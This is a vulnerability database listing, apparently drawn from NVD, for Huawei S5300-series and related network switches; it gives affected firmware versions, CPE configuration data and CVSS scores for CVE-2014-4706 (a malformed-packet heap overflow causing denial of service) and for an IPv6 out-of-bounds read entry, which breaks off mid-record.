Vulnerabilites related to huawei - s5300
Vulnerability from fkie_nvd
Published
2017-04-02 20:59
Modified
2024-11-21 02:10
Summary
Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow.
Impacted products
Vendor Product Version
huawei campus_s3700hi_firmware v200r001c00spc300
huawei campus_s3700hi -
huawei s5700_firmware v200r001c00spc300
huawei s5700 -
huawei s6700_firmware v200r001c00spc300
huawei s6700 -
huawei s3300hi_firmware v200r001c00spc300
huawei s3300hi -
huawei s5300_firmware v200r001c00spc300
huawei s5300 -
huawei s6300_firmware v200r001c00spc300
huawei s6300 -
huawei s9300_firmware v200r001c00spc300
huawei s9300 -
huawei s7700_firmware v200r001c00spc300
huawei s7700 -
huawei lsw_s9700_firmware v200r001c00spc300
huawei lsw_s9700 -
huawei campus_s5700_firmware v200r002c00spc100
huawei campus_s5700 -
huawei s6700_firmware v200r002c00spc100
huawei s6700 -
huawei s5300_firmware v200r002c00spc100
huawei s5300 -
huawei s6300_firmware v200r002c00spc100
huawei s6300 -
huawei campus_s7700_firmware v200r003c00spc300
huawei campus_s7700 -
huawei s9300_firmware v200r003c00spc300
huawei s9300 -
huawei s9300e_firmware v200r003c00spc300
huawei s9300e -
huawei s5300_firmware v200r003c00spc300
huawei s5300 -
huawei s5700_firmware v200r003c00spc300
huawei s5700 -
huawei s6300_firmware v200r003c00spc300
huawei s6300 -
huawei s6700_firmware v200r003c00spc300
huawei s6700 -
huawei s2350_firmware v200r003c00spc300
huawei s2350 -
huawei s2750_firmware v200r003c00spc300
huawei s2750 -
huawei lsw_s9700_firmware v200r003c00spc300
huawei lsw_s9700 -
huawei campus_s7700_firmware v200r003c00spc500
huawei campus_s7700 -
huawei s9300_firmware v200r003c00spc500
huawei s9300 -
huawei s9300e_firmware v200r003c00spc500
huawei s9300e -
huawei lsw_s9700_firmware v200r003c00spc500
huawei lsw_s9700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:campus_s3700hi_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "A4C69CF3-CC8C-46BE-974C-6AD204023E67",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:campus_s3700hi:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B77C6A1-0964-443D-A75D-0E68A59F919B",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "121BEE57-945E-4368-8AE4-4A823D70D31C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "4AF84CB7-7EC9-4978-A4F6-FD5746AF1CE9",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s3300hi_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "361EBDA2-3656-4D57-ABE1-37C6C0FFDC34",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s3300hi:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "080BC2E6-7EEC-450E-BAF0-3DB7B342329A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "93E7A87E-E2FB-4852-9BE5-164822801822",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "7082EE3F-3174-42C2-B010-5078DC752D67",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2D1EF10E-F18B-4F3A-AA2B-25003183E19D",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "07A44DEA-AB17-48F4-87C1-B3B6088BCD82",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:lsw_s9700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFA6C99-8A84-4E8F-9DBC-A3822B02B2F7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:lsw_s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03F0D98A-0118-4F77-96D9-57A3F343FB4C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:campus_s5700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "BA616684-1DDC-4A23-97B0-518EAD07D2A2",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:campus_s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "4F29515E-98DD-496F-B3FC-176CD4B2BD9E",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "AFFF09EB-AA08-4204-B028-182933EC9700",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "647A8737-10F5-4008-8F68-BF8BE4319C56",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "58578CA3-392E-4E6D-9B93-E57DC4F44237",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:campus_s7700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "F12DF054-43B5-42DC-8FDF-664354091ABA",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:campus_s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C949558A-3AAC-4A2A-81C1-B9D7072FF3FF",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "613A5720-C4AC-448E-9170-A113328B4DBF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "11DA3DAE-870F-4F61-9D6B-3FB7D1F49D82",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B913A258-48B6-45D0-A37B-2C665DCA735C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "9D07FB95-7CE7-480A-BF2D-87017EFAE038",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "DEC329F7-D83F-4119-B8CA-CC819EC872CB",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CB0108A-2462-45D6-8A82-8681E8167D6C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D5033F0-7E4F-431A-B4EA-E5D5D1FCFE5E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2350_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "F6E60C34-3553-4374-A7B6-CFA92BC19CDA",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2350:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A2AB6207-F2BC-47A9-980C-62463157A56A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2750_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "69C8196A-21F2-4903-B5B6-B6C9F42B1051",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2750:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B7859972-B7B8-4619-AAED-22B6B14852BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:lsw_s9700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "F2EFAF03-1F00-46A8-B5BE-2AE05BFA3B33",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:lsw_s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03F0D98A-0118-4F77-96D9-57A3F343FB4C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:campus_s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "D7295127-4B3D-44E8-9513-EC2DE1B37479",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:campus_s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C949558A-3AAC-4A2A-81C1-B9D7072FF3FF",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "78DA2DC7-63B3-40D7-BEC7-AF81066A2733",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300e_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "E5752E4C-4B7D-4139-BCAE-7F52D4A235F4",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300e:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B913A258-48B6-45D0-A37B-2C665DCA735C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:lsw_s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C81F30C-4A04-4376-8AA6-E01B76DF2B20",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:lsw_s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03F0D98A-0118-4F77-96D9-57A3F343FB4C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow.",
      },
      {
         lang: "es",
         value: "Huawei Campus S3700HI con software V200R001C00SPC300; Campus S5700 con software V200R002C00SPC100; Campus S7700 con software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 con software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 con software V200R003C00SPC300; S2750 con software V200R003C00SPC300; S5300 con software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 con software V200R001C00SPC300,V200R003C00SPC300; S6300 con software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI con software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 con software V200R001C00SPC300; S9300 con software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E con software V200R003C00SPC300,V200R003C00SPC500 permiten a atacantes seguir enviando paquetes mal formado para provocar un ataque de denegación de servicio (DoS), también conocido como desbordamiento de memoria dinámica.",
      },
   ],
   id: "CVE-2014-4706",
   lastModified: "2024-11-21T02:10:45.347",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2017-04-02T20:59:00.280",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/hw-343218",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-119",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2018-02-15 16:29
Modified
2024-11-21 03:17
Summary
IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset.
Impacted products
Vendor Product Version
huawei quidway_s2700_firmware v200r003c00spc300
huawei quidway_s2700 -
huawei quidway_s5300_firmware v200r003c00spc300
huawei quidway_s5300 -
huawei quidway_s5700_firmware v200r003c00spc300
huawei quidway_s5700 -
huawei s2300_firmware v200r003c00
huawei s2300_firmware v200r003c00spc300t
huawei s2300_firmware v200r005c00
huawei s2300_firmware v200r006c00
huawei s2300_firmware v200r007c00
huawei s2300_firmware v200r008c00
huawei s2300_firmware v200r009c00
huawei s2300 -
huawei s2700_firmware v200r005c00
huawei s2700_firmware v200r006c00
huawei s2700_firmware v200r007c00
huawei s2700_firmware v200r008c00
huawei s2700_firmware v200r009c00
huawei s2700 -
huawei s5300_firmware v200r003c00
huawei s5300_firmware v200r003c00spc300t
huawei s5300_firmware v200r003c00spc600
huawei s5300_firmware v200r003c02
huawei s5300_firmware v200r005c00
huawei s5300_firmware v200r005c01
huawei s5300_firmware v200r005c02
huawei s5300_firmware v200r005c03
huawei s5300_firmware v200r005c05
huawei s5300_firmware v200r006c00
huawei s5300_firmware v200r007c00
huawei s5300_firmware v200r008c00
huawei s5300_firmware v200r009c00
huawei s5300 -
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r003c00spc316t
huawei s5700_firmware v200r003c00spc600
huawei s5700_firmware v200r003c02
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r005c01
huawei s5700_firmware v200r005c02
huawei s5700_firmware v200r005c03
huawei s5700_firmware v200r006c00
huawei s5700_firmware v200r007c00
huawei s5700_firmware v200r008c00
huawei s5700_firmware v200r009c00
huawei s5700 -
huawei s600-e_firmware v200r008c00
huawei s600-e_firmware v200r009c00
huawei s600-e -
huawei s6300_firmware v200r003c00
huawei s6300_firmware v200r005c00
huawei s6300_firmware v200r007c00
huawei s6300_firmware v200r008c00
huawei s6300_firmware v200r009c00
huawei s6300 -
huawei s6700_firmware v200r003c00
huawei s6700_firmware v200r005c00
huawei s6700_firmware v200r005c01
huawei s6700_firmware v200r005c02
huawei s6700_firmware v200r007c00
huawei s6700_firmware v200r008c00
huawei s6700_firmware v200r009c00
huawei s6700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s2700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "B08E7609-C571-4153-AF1F-120B2DE2E7FA",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s2700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "CC5853F5-8FEB-4B7E-9303-4BB25BE292F6",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "4D3FED39-7AA4-4F95-804E-906CEBFED132",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "4C872196-628D-42A2-AC58-69CD8784CE5D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:quidway_s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                     matchCriteriaId: "C4323CCE-DD88-4955-8D80-30D7A6733C92",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:quidway_s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6E83E3A8-C28D-437E-AC09-153B8A2FD14E",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C6CC00C-1056-426B-9828-1A886F2C8D41",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00spc300t:*:*:*:*:*:*:*",
                     matchCriteriaId: "2309FEA1-08EF-4D7C-A696-A9A38E6AEDDD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F1C82DA6-8D95-45D2-B54C-CFE1AA9CC1F1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1F982369-1A22-4F39-90AD-ABB824845774",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r007c00:*:*:*:*:*:*:*",
